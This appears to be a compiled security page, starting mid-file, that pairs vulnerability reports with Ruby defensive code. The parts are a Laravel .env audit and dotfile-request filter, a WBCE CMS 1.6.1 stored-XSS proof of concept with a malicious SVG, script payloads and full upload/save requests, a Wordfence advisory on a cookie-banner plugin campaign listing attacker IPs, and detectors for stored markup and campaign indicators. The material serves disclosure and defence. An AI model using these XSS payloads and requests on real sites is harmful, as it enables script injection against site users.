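    findings << 'APP_DEBUG=true: the error page will print the environment, including DB credentials'
  end
  if env['APP_ENV'] == 'production' && !env.key?('APP_DEBUG')
    findings << 'APP_ENV=production without an explicit APP_DEBUG=false'
  end
  findings << 'DB_PASSWORD is empty' if env.key?('DB_PASSWORD') && env['DB_PASSWORD'].empty?
  findings << 'APP_KEY is not set' if env['APP_KEY'].to_s.empty?
  findings
end

# Should the web server refuse this request path? Percent-encoding is undone
# until stable (so %2Eenv and %252Eenv both become .env) and "." / ".." segments
# are collapsed (so /public/../.env is seen as /.env). A path that does not
# decode at all is malformed and is refused rather than guessed at.
def dotfile_request?(raw_path)
  path = raw_path.to_s.split('?').first.to_s
  3.times do
    decoded = URI.decode_www_form_component(path)
    break if decoded == path
    path = decoded
  end
  segments = []
  path.split('/').each do |seg|
    next if seg.empty? || seg == '.'
    seg == '..' ? segments.pop : segments << seg
  end
  segments.any? { |seg| seg.start_with?('.') }
rescue ArgumentError
  true
end

# Constructed sample .env with the two mistakes the advisory relies on.
SAMPLE_ENV = <<~ENV
  APP_NAME=Laravel
  APP_ENV=production
  APP_KEY=base64:PLACEHOLDER_NOT_A_REAL_KEY=
  APP_DEBUG=true
  DB_CONNECTION=mysql
  DB_PASSWORD=
ENV

if __FILE__ == $0
  audit_laravel_env(SAMPLE_ENV).each { |f| puts "finding: #{f}" }
  %w[/.env /lala/.env?x=1 /%2Eenv /public/../.env /index.php].each do |p|
    puts "#{p} -> #{dotfile_request?(p) ? 'refuse' : 'allow'}"
  end
end
```

`dotfile_request?` is the decision a deny rule for `/\.` in the web server makes; running it over recent access-log paths shows which requests such a rule would have stopped, and `audit_laravel_env` is the check to run against the deployed `.env` before the site goes live.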
<pre><code>Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)<br />Version: 1.6.1<br />Bugs: XSS<br />Technology: PHP<br />Vendor URL: https://wbce-cms.org/<br />Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1<br />Date of found: 03-05-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />###XSS-1###<br />steps: <br /><br />1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/)<br />2. upload malicious svg file<br /><br />svg file content ===><br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br /><br /><br />poc request:<br /><br />POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1<br />Host: localhost<br />Content-Length: 976<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-platform: "Linux"<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtO<br />Accept: */*<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: 
stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167<br />Connection: close<br /><br />------WebKitFormBoundary5u4r3pOGl4EnuBtO<br />Content-Disposition: form-data; name="reqid"<br /><br />187de34ea92ac<br />------WebKitFormBoundary5u4r3pOGl4EnuBtO<br />Content-Disposition: form-data; name="cmd"<br /><br />upload<br />------WebKitFormBoundary5u4r3pOGl4EnuBtO<br />Content-Disposition: form-data; name="target"<br /><br />l1_Lw<br />------WebKitFormBoundary5u4r3pOGl4EnuBtO<br />Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />------WebKitFormBoundary5u4r3pOGl4EnuBtO<br />Content-Disposition: form-data; name="mtime[]"<br /><br />1683056102<br />------WebKitFormBoundary5u4r3pOGl4EnuBtO--<br /><br /><br />3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg)<br /><br /><br /><br />========================================================================================================================<br /><br />###XSS-2###<br /><br />1. go to pages (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages)<br />2. add page<br />3. 
write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E)<br />payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3E<br />poc request:<br /><br />POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1<br />Host: localhost<br />Content-Length: 143<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475<br />Connection: close<br /><br />page_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save<br /><br /><br />4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php<br /><br /></code></pre>
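The SCM Manager, Zenphoto and WBCE reports above are all the same defect: text saved in a name, description, postal-code or page field, or inside an uploaded SVG, is later emitted into HTML unchanged. The Ruby below is an added example rather than any of those projects' code. It audits stored field values for active markup with a regex sweep (useful after the fact, to find what an attacker left in the database), checks an uploaded SVG with an XML parser (REXML, from Ruby's bundled gems) for `script` elements, event-handler attributes and `javascript:` links before the file is accepted, and shows the escaping a template should apply on output. The sample records are modelled on the payloads in the reports and the sample SVG mirrors the one in the WBCE report; the record layout is an assumption.

```ruby
require 'rexml/document'
require 'erb'

# Markup that executes or loads code when a browser renders it as HTML.
ACTIVE_HTML = [
  [/<script\b/i,                'script element'],
  [/<(iframe|object|embed)\b/i, 'embedded document'],
  [/\bon[a-z]+\s*=/i,           'event-handler attribute'],
  [/javascript\s*:/i,           'javascript: URL'],
  [/<svg\b/i,                   'inline svg']
].freeze

# Sweeps stored records (id => {field => value}) and returns one finding per
# field per kind of active markup it carries.
def audit_stored_fields(records)
  records.flat_map do |id, fields|
    fields.flat_map do |field, value|
      ACTIVE_HTML.select { |re, _| value.to_s =~ re }
                 .map { |_, what| { id: id, field: field, reason: what } }
    end
  end
end

# Inspects an uploaded SVG with a real XML parser. Returns the reasons it should
# be refused (or served only as a download with Content-Disposition: attachment),
# or an empty array for a clean image.
def svg_active_content(xml)
  doc = REXML::Document.new(xml)
  reasons = []
  REXML::XPath.each(doc, '//*') do |el|
    name = el.name.downcase
    reasons << "<#{name}> element" if %w[script foreignobject].include?(name)
    el.attributes.each do |attr, val|
      a = attr.downcase
      reasons << "#{a} handler on <#{name}>" if a.start_with?('on')
      reasons << "#{a} on <#{name}> uses javascript:" if val.to_s.strip =~ /\Ajavascript:/i
    end
  end
  reasons
rescue REXML::ParseException
  ['not well-formed XML']
end

# Output escaping a view must apply to any stored value rendered as text.
def render_text(value)
  ERB::Util.html_escape(value.to_s)
end

# Constructed records modelled on the payloads in the reports above.
SAMPLE_RECORDS = {
  'user:newUser'   => { 'displayName' => "<img src=x onerror=alert('XSS')>" },
  'group:newGroup' => { 'description' => 'Release engineering' },
  'album:1'        => { 'description' => '<iframe src="https://example.invalid"></iframe>' },
  'user:2'         => { 'postal_code' => '<script>alert(4)</script>' }
}.freeze

# Constructed SVG mirroring the WBCE upload.
SAMPLE_SVG = <<~SVG
  <?xml version="1.0" standalone="no"?>
  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    <script type="text/javascript">alert(document.location);</script>
  </svg>
SVG

if __FILE__ == $0
  audit_stored_fields(SAMPLE_RECORDS).each { |f| puts "#{f[:id]}.#{f[:field]}: #{f[:reason]}" }
  puts "svg: #{svg_active_content(SAMPLE_SVG).inspect}"
  puts "escaped: #{render_text(SAMPLE_RECORDS['user:2']['postal_code'])}"
end
```

The regex sweep is deliberately broad (it will flag a description that merely mentions `<script>`), which is the right trade-off for an audit; the SVG check parses rather than pattern-matches so that attribute case, whitespace and namespace prefixes do not let active content through.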
<pre><code>Description: Beautiful Cookie Consent Banner <= 2.10.1 - Unauthenticated Stored Cross-Site Scripting <br /><br />Affected Plugin: Beautiful Cookie Consent Banner<br /><br />Plugin Slug: beautiful-and-responsive-cookie-consent<br /><br />Affected Versions: <= 2.10.1<br /><br />CVE ID: Not Assigned<br /><br />CVSS Score: 7.2 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Unknown<br /><br />Fully Patched Version: 2.10.2<br /><br />The Beautiful Cookie Consent Banner for WordPress is vulnerable to Stored Cross-Site Scripting via the 'nsc_bar_content_href' parameter in versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. A partial patch was made available in 2.10.1 and the issue was fully patched in 2.10.2.<br /><br />The Attacks<br /><br />According to our records, the vulnerability has been actively attacked since February 5, 2023, but this is the largest attack against it that we have seen. We have blocked nearly 3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023, and attacks are ongoing.<br /><br />[Figure: a chart showing sites attacked and total attacks targeting this vulnerability]<br /><br />We believe that this is the work of a single actor, as every single attack contained a partial payload of onmouseenter=" and no further functioning JavaScript. 
It is likely that this set of attacks is being performed using a misconfigured exploit that expects a customized payload, and that the attacker has simply failed to provide one.<br /><br />Despite this, if your website is running a vulnerable version of the plugin and you are not currently using Wordfence or another Web Application Firewall, these attacks can still corrupt the plugin's configuration and break its intended functionality. We therefore still recommend updating to the latest version, which is 2.13.0 at the time of this writing, as soon as possible.<br /><br />Indicators of Compromise<br /><br />Requests<br /><br />[Figure: an example request showing the payload being used]<br /><br />POST requests to /wp-admin/admin-post.php from unrecognized IP addresses may appear in your server logs, or in your Live Traffic if you have the Wordfence plugin installed.<br /><br />IP Addresses<br /><br />We have included the top 20 attacking IP addresses, though there are many more:<br /><br />- 209.126.12.142<br />- 101.34.223.139<br />- 92.204.37.157<br />- 66.37.4.138<br />- 92.205.48.232<br />- 212.237.233.32<br />- 195.201.82.166<br />- 67.205.58.212<br />- 51.38.27.102<br />- 173.236.213.148<br />- 207.244.241.230<br />- 74.208.177.185<br />- 92.204.33.117<br />- 134.119.0.186<br />- 5.9.238.21<br />- 92.205.64.149<br />- 94.158.149.174<br />- 173.236.215.161<br />- 92.205.48.177<br />- 190.54.62.76<br /><br />If your site was impacted by this or an earlier attack campaign, it may have corrupted the nsc_bar_bannersettings_json option in your database. 
The plugin's developers have included functionality in patched versions to repair any changes made as a result of this exploit.<br /><br />Conclusion<br /><br />In today’s article, we covered an uptick in attacks targeting a patched vulnerability in Beautiful Cookie Consent Banner.<br /><br />All Wordfence sites, including those running Wordfence Free, Wordfence Premium, Wordfence Care, and Wordfence Response, are protected against this vulnerability by the Wordfence Firewall’s Built-in Cross-Site Scripting protection.<br /><br />However, if you have friends or colleagues running this plugin, please forward this advisory to them - while the current wave of attacks does not contain a malicious payload, the attacker behind this is targeting a large list of sites and has significant resources available to them, and it would be simple for them to update their exploit configuration with a viable malicious payload.<br /><br />If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.<br /><br />If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. <br /><br /></code></pre>
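As an added example (not Wordfence's code or tooling), the Ruby below turns the indicators in this article into two checks a site owner can run offline: matching request records against the listed attacking addresses, the `/wp-admin/admin-post.php` endpoint, the `nsc_bar_content_href` parameter and the partial `onmouseenter="` payload, and walking the plugin's `nsc_bar_bannersettings_json` option for the same payload in any of its string values. The IP list, endpoint, parameter, option name and payload fragment come from the article; the request records and the option JSON are constructed, and since the option's internal field names are not given, the check walks every string rather than relying on a specific key.

```ruby
require 'json'

# Top attacking IP addresses listed in the article.
ATTACKING_IPS = %w[
  209.126.12.142 101.34.223.139 92.204.37.157 66.37.4.138 92.205.48.232
  212.237.233.32 195.201.82.166 67.205.58.212 51.38.27.102 173.236.213.148
  207.244.241.230 74.208.177.185 92.204.33.117 134.119.0.186 5.9.238.21
  92.205.64.149 94.158.149.174 173.236.215.161 92.205.48.177 190.54.62.76
].freeze

TARGET_PATH  = '/wp-admin/admin-post.php'
VULN_PARAM   = 'nsc_bar_content_href'
PAYLOAD_MARK = /onmouseenter=/i

# One request as a defender already has it: from access logs, a WAF, or
# Wordfence Live Traffic. body is the decoded POST body (nil for GETs).
Request = Struct.new(:ip, :method, :path, :body, keyword_init: true)

# Returns the indicators a request matches; empty when nothing matched.
def campaign_indicators(req)
  hits = {}
  hits[:known_ip]       = true if ATTACKING_IPS.include?(req.ip)
  hits[:target_path]    = true if req.method == 'POST' && req.path.split('?').first == TARGET_PATH
  hits[:vuln_parameter] = true if req.body.to_s.include?(VULN_PARAM)
  hits[:payload]        = true if req.body.to_s =~ PAYLOAD_MARK
  hits
end

# A request is attributed to the campaign when it carries the payload on the
# target endpoint. A known IP, or an admin legitimately saving the banner's link
# through the same parameter, is only context and is not flagged on its own.
def campaign_request?(req)
  h = campaign_indicators(req)
  (h[:target_path] && h[:payload]) ? true : false
end

# Walks the stored plugin option (JSON text) and returns the dotted paths of
# every string value that carries the payload, so the owner can see whether the
# campaign corrupted the banner settings and which fields need repair.
def tainted_option_fields(json_text)
  walk(JSON.parse(json_text), [])
end

def walk(value, path)
  case value
  when Hash   then value.flat_map { |k, v| walk(v, path + [k]) }
  when Array  then value.each_with_index.flat_map { |v, i| walk(v, path + [i]) }
  when String then value =~ PAYLOAD_MARK ? [path.join('.')] : []
  else []
  end
end

# Constructed request records: one campaign hit, one legitimate settings save,
# one unrelated visit from a listed address.
SAMPLE_REQUESTS = [
  Request.new(ip: '209.126.12.142', method: 'POST', path: TARGET_PATH,
              body: 'nsc_bar_content_href="onmouseenter="'),
  Request.new(ip: '198.51.100.7', method: 'POST', path: TARGET_PATH,
              body: 'nsc_bar_content_href=https://example.invalid/privacy'),
  Request.new(ip: '92.204.37.157', method: 'GET', path: '/', body: nil)
].freeze

# Constructed option value; the real option's field names are not given in the
# article, so this layout is an assumption used only to exercise the walk.
SAMPLE_OPTION = JSON.generate(
  'banner'  => { 'text' => 'We use cookies', 'link' => { 'href' => '"onmouseenter="', 'label' => 'Learn more' } },
  'buttons' => ['Accept', 'Decline']
)

if __FILE__ == $0
  SAMPLE_REQUESTS.each { |r| puts "#{r.ip} #{r.method} #{r.path} -> #{campaign_indicators(r).keys.inspect} campaign=#{campaign_request?(r)}" }
  puts "tainted option fields: #{tainted_option_fields(SAMPLE_OPTION).inspect}"
end
```

The payload-on-endpoint rule is the one to alert on; the IP list is best used as enrichment, because the article itself notes there are many more addresses than the twenty shown.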